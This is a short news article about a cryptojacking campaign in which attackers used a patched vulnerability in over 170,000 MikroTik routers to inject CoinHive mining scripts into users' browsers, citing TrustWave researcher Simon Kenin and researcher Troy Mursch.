A group of cybercriminals is using a network of vulnerable routers to spread malicious software to unsuspecting users to extract cryptobodies, according to a TrustWave security researchers report.
An unknown group of cyber hackers, who may well be a network of criminals, is using a bug in more than 170,000 MikroTik brand routers to run a malicious program on the computers of unsuspecting victims who have the ability to extract cryptosnaps for hackers, according to TrustWave researcher Simon Kenin.
The attack uses a vulnerability – which has already been repaired by MikroTik – to run a script from CoinHive in the browser of any person connected to the infected router. Most of the affected devices are in Brazil, but Simon Kenin warned that this attack has spread to other countries, but to a lesser extent.
Another researcher, Troy Mursch, also noticed a similar case in Moldova where more than 25,000 MikroTik routers were also infected, and they also used a script from CoinHive, so we can easily conclude that they might be the same group from this cybercriminals network.
The specific vulnerability that allows the routers to be exploited has now been dealt with by MikroTik, but many devices remain contaminated and are basically problematic.
However, this problem is actually much larger, explains Kenin, as MikroTik manufactures high-tech equipment often used by internet service providers, large organizations and small and medium-sized businesses.
Simon Kenin added: “Let me explain how smart and methodical this attack is. The attacker instead of chasing to infect small sites with few visitors or find sophisticated ways to run malicious software on end-user computers went directly to the source, going to the router’s devices. There are hundreds of thousands of these devices around the world, used by ISPs, as well as by different organizations and businesses, each such device serves at least dozens if not hundreds of users everyday. “